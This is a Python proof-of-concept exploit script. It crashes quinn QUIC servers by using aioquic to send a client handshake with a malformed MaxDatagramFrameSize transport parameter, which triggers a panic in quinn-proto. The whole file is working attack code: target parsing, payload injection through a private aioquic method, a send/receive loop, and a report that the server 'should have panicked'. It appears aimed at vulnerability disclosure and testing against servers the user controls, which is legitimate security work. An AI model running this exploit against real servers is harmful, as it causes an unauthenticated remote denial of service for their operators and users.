#!/usr/bin/env python3
"""
PoC: crash a quinn server via malformed QUIC transport parameters.

quinn-proto/src/transport_parameters.rs:473 has .unwrap() on a fallible
VarInt decode. Sending MaxDatagramFrameSize (0x20) with length 0 causes
VarInt::decode to return Err(UnexpectedEnd), and the unwrap panics.

A single crafted UDP datagram crashes a quinn server running an affected
version (unauthenticated remote DoS). Run it only against servers you control.

Usage:
    # Terminal 1: start the example server
    cargo run --example server -- ./

    # Terminal 2: send the malicious packet
    python3 attack.py [::1]:4433
"""

from __future__ import annotations

import argparse
import socket
import sys
import time
from typing import Tuple

from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic.connection import QuicConnection

# Target used when none is given on the command line; matches the Usage
# example in the module docstring.
DEFAULT_TARGET: str = "[::1]:4433"
# Seconds to wait for replies after each round of sends.
DEFAULT_TIMEOUT: float = 0.35
# Upper bound on send/receive rounds (the loop stops early when there is
# nothing left to send).
DEFAULT_ROUNDS: int = 8


def parse_target(value: str) -> Tuple[str, int]:
    """Split a ``host:port`` string into ``(host, port)``.

    IPv6 literals should be bracketed, e.g. ``[::1]:4433``. For unbracketed
    input the port is taken after the *last* colon, so ``::1:4433`` also
    yields ``("::1", 4433)``.

    Raises:
        ValueError: if the brackets are malformed, the host or port is
            missing, the port is not an integer, or the port is outside
            1-65535.
    """
    if value.startswith("["):
        bracket_end = value.find("]")
        if bracket_end == -1:
            raise ValueError(f"invalid target '{value}', missing ']'")
        host = value[1:bracket_end]
        rest = value[bracket_end + 1 :]
        # Require an explicit ':' after ']' instead of blindly skipping one
        # character, which would silently mangle e.g. "[::1]4433".
        if not rest.startswith(":"):
            raise ValueError(f"invalid target '{value}', expected [host]:port")
        port_str = rest[1:]
    else:
        host, _, port_str = value.rpartition(":")
    if not host:
        raise ValueError(f"invalid target '{value}', expected host:port")
    try:
        port = int(port_str)
    except ValueError:
        raise ValueError(f"invalid port '{port_str}' in target '{value}'") from None
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return host, port


def build_malformed_connection(target_addr):
    """Create an aioquic client connection that advertises bad transport params.

    The connection's transport-parameter serializer is swapped for one that
    returns a fixed two-byte blob, and only then is ``connect()`` called.
    Presumably aioquic serializes the parameters while ``connect()`` sets up
    the handshake, which is why the swap must come first — TODO confirm
    against the installed aioquic version.

    NOTE(review): ``_serialize_transport_parameters`` is a private aioquic
    method; verify it still exists if aioquic is upgraded.
    """
    # Parameter ID 0x20 (MaxDatagramFrameSize) followed by a value length of
    # 0x00, i.e. no value bytes at all.
    malformed_params = b"\x20\x00"

    def _malformed_transport_parameters():
        # quinn does r.get::<VarInt>().unwrap() on the empty value → panic
        return malformed_params

    connection = QuicConnection(
        configuration=QuicConfiguration(is_client=True, alpn_protocols=["hq-29"])
    )
    connection._serialize_transport_parameters = _malformed_transport_parameters
    connection.connect(target_addr, now=time.time())
    return connection


def exploit_once(host: str, port: int, timeout_s: float, rounds: int):
    """Run one malformed-handshake exchange against ``host:port``.

    Resolves the target, opens a UDP socket of the matching address family,
    and for up to ``rounds`` iterations sends every datagram the aioquic
    connection has queued, then feeds any replies received within
    ``timeout_s`` seconds back into the connection. Stops early when the
    connection has nothing left to send, or when the socket reports that
    the peer is unreachable.

    Returns:
        ``(sent_packets, sent_bytes, recv_packets)``.

    Raises:
        socket.gaierror: if ``host`` cannot be resolved.
        OSError: on other socket failures.
    """
    infos = socket.getaddrinfo(host, port, type=socket.SOCK_DGRAM)
    family, _socktype, _proto, _canonname, sockaddr = infos[0]

    conn = build_malformed_connection(sockaddr)
    sent_packets = 0
    sent_bytes = 0
    recv_packets = 0

    with socket.socket(family, socket.SOCK_DGRAM) as sock:
        bind_addr = ("::", 0, 0, 0) if family == socket.AF_INET6 else ("0.0.0.0", 0)
        sock.bind(bind_addr)

        # NOTE(review): conn.handle_timer() is never called, so aioquic may
        # not queue retransmissions; later rounds likely only carry responses
        # to received packets — confirm if multi-round behavior matters.
        for _ in range(rounds):
            outgoing = conn.datagrams_to_send(now=time.time())
            if not outgoing:
                break

            for data, addr in outgoing:
                sock.sendto(data, addr)
                sent_packets += 1
                sent_bytes += len(data)

            # The receive window is measured on a monotonic clock so that
            # wall-clock adjustments cannot stretch or truncate it. aioquic
            # itself keeps receiving time.time(), the same clock passed to
            # connect() when the connection was built.
            deadline = time.monotonic() + timeout_s
            while True:
                remaining = deadline - time.monotonic()
                if remaining <= 0:
                    break
                sock.settimeout(remaining)
                try:
                    data, addr = sock.recvfrom(8192)
                except socket.timeout:
                    break
                except (ConnectionRefusedError, ConnectionResetError):
                    # Some platforms may surface an ICMP port-unreachable on
                    # an unconnected UDP socket as an error from the next
                    # recv. Treat it as "nobody is listening anymore" and
                    # report what was already exchanged instead of failing.
                    return sent_packets, sent_bytes, recv_packets
                recv_packets += 1
                conn.receive_datagram(data, addr, now=time.time())

    return sent_packets, sent_bytes, recv_packets


def main() -> int:
    """Parse the command line, run one exchange, and return an exit status.

    Exit statuses:
        0: at least one datagram was sent.
        1: the exchange raised an error, or nothing was sent.
        2: invalid command-line arguments (bad target, rounds or timeout).
    """
    import math

    parser = argparse.ArgumentParser(
        description="PoC: crash a quinn server via malformed transport parameters"
    )
    parser.add_argument("target", nargs="?", default=DEFAULT_TARGET)
    parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT)
    parser.add_argument("--rounds", type=int, default=DEFAULT_ROUNDS)
    args = parser.parse_args()

    # Reject values that would either send nothing (rounds < 1) or break the
    # socket timeout computation (negative / NaN / infinite timeout).
    # parser.error() exits with status 2, matching the bad-target path below.
    if not (math.isfinite(args.timeout) and args.timeout >= 0):
        parser.error("--timeout must be a finite number >= 0")
    if args.rounds < 1:
        parser.error("--rounds must be >= 1")

    try:
        host, port = parse_target(args.target)
    except ValueError as exc:
        print(f"error: {exc}", file=sys.stderr)
        return 2

    print(f"target={host}:{port} timeout={args.timeout}s rounds={args.rounds}")

    try:
        sent_packets, sent_bytes, recv_packets = exploit_once(
            host, port, args.timeout, args.rounds
        )
    except Exception as exc:
        # Top-level boundary: socket and aioquic failures are reported
        # uniformly instead of as a traceback.
        print(f"error: {exc}", file=sys.stderr)
        return 1

    print(f"sent_packets={sent_packets}, sent_bytes={sent_bytes}, recv_packets={recv_packets}")
    if sent_packets > 0:
        print("payload delivered — server should have panicked")
        return 0

    print("error: no packets sent", file=sys.stderr)
    return 1


if __name__ == "__main__":
    # Hand main()'s integer result to the interpreter as the exit status.
    sys.exit(main())
